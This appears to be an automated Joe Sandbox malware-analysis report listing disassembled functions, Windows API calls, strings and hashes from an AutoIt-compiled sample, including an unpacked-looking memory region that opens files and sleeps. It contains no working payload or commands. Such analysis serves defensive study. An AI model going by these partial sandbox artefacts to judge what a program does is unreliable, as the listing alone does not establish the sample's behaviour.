RegisterClassExW.USER32(00000030), ref: 00AA309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA30AF
InitCommonControlsEx.COMCTL32(?), ref: 00AA30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA30DC
LoadIconW.USER32(000000A9), ref: 00AA30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA3101

Strings

0, xrefs: 00AA3056
AutoIt v3 GUI, xrefs: 00AA3090
+, xrefs: 00AA305D
TaskbarCreated, xrefs: 00AA30A4

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: f1a8ce709c65a8a86fcc1bef93eae75f4bbf6d6d9653128466045503f3dbcb37
Instruction ID: a926fadcf8571ae3ded0dc568a8b9a517e19d62e5cc764aff403e9a76ec7c255
Opcode Fuzzy Hash: f1a8ce709c65a8a86fcc1bef93eae75f4bbf6d6d9653128466045503f3dbcb37
Instruction Fuzzy Hash: 233138B184134AAFDB20CFA4E889ADDBBF0FB09310F14456EE580A72A1DBB90591CF51

Function 00AA3041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AA3074
RegisterClassExW.USER32(00000030), ref: 00AA309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA30AF
InitCommonControlsEx.COMCTL32(?), ref: 00AA30CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA30DC
LoadIconW.USER32(000000A9), ref: 00AA30F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA3101

Strings

0, xrefs: 00AA3056
AutoIt v3 GUI, xrefs: 00AA3090
+, xrefs: 00AA305D
TaskbarCreated, xrefs: 00AA30A4

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 3ad03de680048ab6dac325516cc09af3a2682f38d88b69d8724357aa62c3575c
Instruction ID: e2136aef6134c1cdef96e50491261e1fcd9a49648002cd1c82b608da5ecb0ef9
Opcode Fuzzy Hash: 3ad03de680048ab6dac325516cc09af3a2682f38d88b69d8724357aa62c3575c
Instruction Fuzzy Hash: D221C7B1D01219AFDB20DFA4ED49BEEBBF4FB08700F00412AF550A72A0DBB545558F95

Function 00AA708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00AA4706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00B652F8,?,00AA37AE,?), ref: 00AA4724

Part of subcall function 00AC050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00AA7165), ref: 00AC052D

RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00AA71A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00ADE8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00ADE909
RegCloseKey.ADVAPI32(?), ref: 00ADE947
_wcscat.LIBCMT ref: 00ADE9A0

Strings

Software\AutoIt v3\AutoIt, xrefs: 00AA719E
\Include\, xrefs: 00AA7165
Include, xrefs: 00ADE8BF, 00ADE900
\, xrefs: 00ADE9C3

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
Opcode ID: 010b4247bafc1d67ffcf2e1460475976352e3af7ff9fb6fdc8499abbe96c2e37
Instruction ID: 6eb777d2a709eeb8cf659132bd1e7ef9f8450fb149d27e825f22e5e3995b8bf9
Opcode Fuzzy Hash: 010b4247bafc1d67ffcf2e1460475976352e3af7ff9fb6fdc8499abbe96c2e37
Instruction Fuzzy Hash: 96716B725093019EC304EF65ED619AFBBF8FF89350B40092EF445872E0EBB59948CB92

Function 00AA3A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00AA3A50
LoadCursorW.USER32(00000000,00007F00), ref: 00AA3A5F
LoadIconW.USER32(00000063), ref: 00AA3A76
LoadIconW.USER32(000000A4), ref: 00AA3A88
LoadIconW.USER32(000000A2), ref: 00AA3A9A
LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00AA3AC0
RegisterClassExW.USER32(?), ref: 00AA3B16

Part of subcall function 00AA3041: GetSysColorBrush.USER32(0000000F), ref: 00AA3074
Part of subcall function 00AA3041: RegisterClassExW.USER32(00000030), ref: 00AA309E
Part of subcall function 00AA3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA30AF
Part of subcall function 00AA3041: InitCommonControlsEx.COMCTL32(?), ref: 00AA30CC
Part of subcall function 00AA3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00AA30DC
Part of subcall function 00AA3041: LoadIconW.USER32(000000A9), ref: 00AA30F2
Part of subcall function 00AA3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00AA3101

Strings

#, xrefs: 00AA3AFB
AutoIt v3, xrefs: 00AA3B05
0, xrefs: 00AA3AF4

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
String ID: #$0$AutoIt v3
API String ID: 423443420-4155596026
Opcode ID: ffc9a28a9a13b4835d92f43503f5528eb27830ecb6a83604ab494a48f028b32a
Instruction ID: 51c15e6c8c4151b5e9cfb46cab241d226d6a5e261fb3afbdf69fcac75709fb64
Opcode Fuzzy Hash: ffc9a28a9a13b4835d92f43503f5528eb27830ecb6a83604ab494a48f028b32a
Instruction Fuzzy Hash: 44210671D00309AFEB20DFA4ED59BAD7BB4EB08711F10012AF504A72E1DBB95A608F94

Function 00AA3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151
windowtimeregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DefWindowProcW.USER32(?,?,?,?), ref: 00AA36D2
KillTimer.USER32(?,00000001), ref: 00AA36FC
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AA371F
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00AA372A
CreatePopupMenu.USER32 ref: 00AA373E
PostQuitMessage.USER32(00000000), ref: 00AA374D

Strings

TaskbarCreated, xrefs: 00AA3725

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
String ID: TaskbarCreated
API String ID: 129472671-2362178303
Opcode ID: d882296679bdb578b94c43e3ea4d1e901ce17ef9d814c6a85a64041d25fead6c
Instruction ID: 1d7403435502b268a123181260e769d94f4ba8adb55ddbaf6f6308a903936bd5
Opcode Fuzzy Hash: d882296679bdb578b94c43e3ea4d1e901ce17ef9d814c6a85a64041d25fead6c
Instruction Fuzzy Hash: 8B41E7B3200506BBDF349F68DD09BBA37A9EB46300F140139F602972F2DFA59E659661

Function 00AA3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

>>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00AA37AE
/AutoIt3ExecuteScript, xrefs: 00AA38BC
CMDLINE, xrefs: 00AA3822
/AutoIt3ExecuteLine, xrefs: 00AA38A7
CMDLINERAW, xrefs: 00AA37FB
/AutoIt3OutputDebug, xrefs: 00AA3892
/ErrorStdOut, xrefs: 00AA387D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
API String ID: 1825951767-3513169116
Opcode ID: 6024b1ec2d3f5dbc6b233f6ae171a8ceac53b7e2ab47e6c6776ed4b24b10499f
Instruction ID: c3f78ca56b2712cd4e109d47d8c189d8a697277521df9d9b602d7c9cf0354be4
Opcode Fuzzy Hash: 6024b1ec2d3f5dbc6b233f6ae171a8ceac53b7e2ab47e6c6776ed4b24b10499f
Instruction Fuzzy Hash: B6A12B7291021D9ACF15EBA4DD91EEEBBB9BF16300F44052AF416B71D1DF789A08CB60

Function 014E5D70 Relevance: 10.7, APIs: 7, Instructions: 151
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 014E5DB5

Memory Dump Source

Source File: 00000000.00000002.1354881625.00000000014E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 014E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e5000_MBOaS3GRtF.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction ID: 7375babb0c2c596a39af33276e579bf927a0e3ea421f642e18f849ba1c9b6f22
Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
Instruction Fuzzy Hash: A0511779A10208FBEF20DFA4CC5DFEE77B8AF48705F108555F60AEE280DA7496458B60

Function 00AC9AE6 Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__init_pointers.LIBCMT ref: 00AC9AE6

Part of subcall function 00AC3187: EncodePointer.KERNEL32(00000000), ref: 00AC318A
Part of subcall function 00AC3187: __initp_misc_winsig.LIBCMT ref: 00AC31A5
Part of subcall function 00AC3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00AC9EA0
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00AC9EB4
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00AC9EC7
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00AC9EDA
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00AC9EED
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00AC9F00
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00AC9F13
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00AC9F26
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00AC9F39
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00AC9F4C
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00AC9F5F
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00AC9F72
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00AC9F85
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00AC9F98
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00AC9FAB
Part of subcall function 00AC3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00AC9FBE

__mtinitlocks.LIBCMT ref: 00AC9AEB
__mtterm.LIBCMT ref: 00AC9AF4

Part of subcall function 00AC9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00AC9AF9,00AC7CD0,00B5A0B8,00000014), ref: 00AC9C56
Part of subcall function 00AC9B5C: _free.LIBCMT ref: 00AC9C5D
Part of subcall function 00AC9B5C: DeleteCriticalSection.KERNEL32(00B5EC00,?,?,00AC9AF9,00AC7CD0,00B5A0B8,00000014), ref: 00AC9C7F

__calloc_crt.LIBCMT ref: 00AC9B19
__initptd.LIBCMT ref: 00AC9B3B
GetCurrentThreadId.KERNEL32 ref: 00AC9B42

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: 940823fa6bccec07f0b9e59250dbe419a60c46529f3894f2c6435b8a7af65aad
Instruction ID: c160710fade67906d87b428ab082093f8c5d93761b8f3b008fe9e596125923fc
Opcode Fuzzy Hash: 940823fa6bccec07f0b9e59250dbe419a60c46529f3894f2c6435b8a7af65aad
Instruction Fuzzy Hash: E7F06D325097116AEA347B78BD0BF4B2694AF02771B234A2EF464960D2EE60994245A4

Function 00AA39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00AA3A03
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00AA3A24
ShowWindow.USER32(00000000,?,?), ref: 00AA3A38
ShowWindow.USER32(00000000,?,?), ref: 00AA3A41

Strings

edit, xrefs: 00AA3A1E
AutoIt v3, xrefs: 00AA39FB, 00AA3A00, 00AA3A01

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 1f2b8746be5ddaf2a3d1ab0219c2f24d4ed583febbaa894ab2a7c6c45ed2e986
Instruction ID: 331169d6547fc02fb9f8af3cf5a834c0a7f06c5d60d0e1f4a348e7d0c2fb54e5
Opcode Fuzzy Hash: 1f2b8746be5ddaf2a3d1ab0219c2f24d4ed583febbaa894ab2a7c6c45ed2e986
Instruction Fuzzy Hash: 40F0DA715416907EEA315B276C59E7B2E7DD7C6F50F00413AF904A31B0CAA91861DAB0

Function 00AA407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00ADD3D7

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

_memset.LIBCMT ref: 00AA40FC
_wcscpy.LIBCMT ref: 00AA4150
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AA4160

Strings

Line: , xrefs: 00ADD400

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: b705d5c906f47820e3445572a2272596c377f5dc5b28f8dfb6e21cb08e1922b6
Instruction ID: c1733ece3384ccb6168db15ccbbdf02875252a4d16a14d50a0fb9cf7861fba9b
Opcode Fuzzy Hash: b705d5c906f47820e3445572a2272596c377f5dc5b28f8dfb6e21cb08e1922b6
Instruction Fuzzy Hash: 2731AD71008305AAD331EB60ED46FDB77E8AB95310F10461AF686931E1EFB89658CB92

Function 00AC541D Relevance: 7.7, APIs: 5, Instructions: 163
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memset.LIBCMT ref: 00AC547B
_memcpy_s.LIBCMT ref: 00AC54ED
__read_nolock.LIBCMT ref: 00AC554B
__filbuf.LIBCMT ref: 00AC556E
_memset.LIBCMT ref: 00AC55B2

Part of subcall function 00AC8B28: __getptd_noexit.LIBCMT ref: 00AC8B28

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
String ID:
API String ID: 1559183368-0
Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction ID: ba36b9ff97ce80aa437cf12c429e6cf3a8e43592979ea8d97a8dbc52d216d1a8
Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
Instruction Fuzzy Hash: 2F517270E00A099BDB288F79D940F6E77B7AF45321F25862DF825962D1DB70ADD08B40

Function 00AA686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON

Download Yara Rule

APIs

Part of subcall function 00AA4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00B652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4E0F

_free.LIBCMT ref: 00ADE263
_free.LIBCMT ref: 00ADE2AA

Part of subcall function 00AA6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AA6BAD

Strings

>>>AUTOIT SCRIPT<<<, xrefs: 00ADE039
Bad directive syntax error, xrefs: 00ADE292

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _free$CurrentDirectoryLibraryLoad
String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
API String ID: 2861923089-1757145024
Opcode ID: 0a41c7862e2a7bed1140a53869ec93924b016c31870fbe1862f4808c359fc822
Instruction ID: 883cac62d8238cb6da7a166e6dcf4bd0fb37005d03a9f6f4020a5c9db5ec05db
Opcode Fuzzy Hash: 0a41c7862e2a7bed1140a53869ec93924b016c31870fbe1862f4808c359fc822
Instruction Fuzzy Hash: 97919E71A00219EFCF04EFA4CD819EEB7B8FF19310F14446AF816AB2A1DB74A945CB50

Function 014E7840 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 161fileCOMMON

Download Yara Rule

APIs

Part of subcall function 014E7730: Sleep.KERNELBASE(000001F4), ref: 014E7741

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014E798E

Strings

GXZSB8OQPKQUQ9AEM79IS5YI9, xrefs: 014E7A0E, 014E7A11

Memory Dump Source

Source File: 00000000.00000002.1354881625.00000000014E5000.00000040.00000020.00020000.00000000.sdmp, Offset: 014E5000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_14e5000_MBOaS3GRtF.jbxd

Similarity

API ID: CreateFileSleep
String ID: GXZSB8OQPKQUQ9AEM79IS5YI9
API String ID: 2694422964-774641758
Opcode ID: 7a603f2d03e7438f0ba7128aadbdebbfbb70ed6a0c9141af8399142e9d3045a5
Instruction ID: fa33d522bb3af3ae8fe67377c76ffc314a2a97263ce42abc6d9ab06b5d32fde9
Opcode Fuzzy Hash: 7a603f2d03e7438f0ba7128aadbdebbfbb70ed6a0c9141af8399142e9d3045a5
Instruction Fuzzy Hash: 2261B130D04248DAEF11DBE8D848BEFBBB5AF19315F004199E2487B2C1D7B91B49CBA5

Function 00AA35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,00AA35A1,SwapMouseButtons,00000004,?), ref: 00AA35D4
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,00AA35A1,SwapMouseButtons,00000004,?,?,?,?,00AA2754), ref: 00AA35F5
RegCloseKey.KERNELBASE(00000000,?,?,00AA35A1,SwapMouseButtons,00000004,?,?,?,?,00AA2754), ref: 00AA3617

Strings

Control Panel\Mouse, xrefs: 00AA35D2

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 0d836b3e5720a248e58517fabb3775798383c73ae8aa3e588ba54357ca5b61fb
Instruction ID: f7bc62d99f9b1764b556e32e79f1748c06495f3f2d769e66a2a633546fbcc676
Opcode Fuzzy Hash: 0d836b3e5720a248e58517fabb3775798383c73ae8aa3e588ba54357ca5b61fb
Instruction Fuzzy Hash: 00113672910208BADF208FA4D840DABB7B8EF05740F00846AB805D7250E7719E419B60

Function 00B0955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 00AA4EE5: _fseek.LIBCMT ref: 00AA4EFD

Part of subcall function 00B09734: _wcscmp.LIBCMT ref: 00B09824
Part of subcall function 00B09734: _wcscmp.LIBCMT ref: 00B09837

_free.LIBCMT ref: 00B096A2
_free.LIBCMT ref: 00B096A9
_free.LIBCMT ref: 00B09714

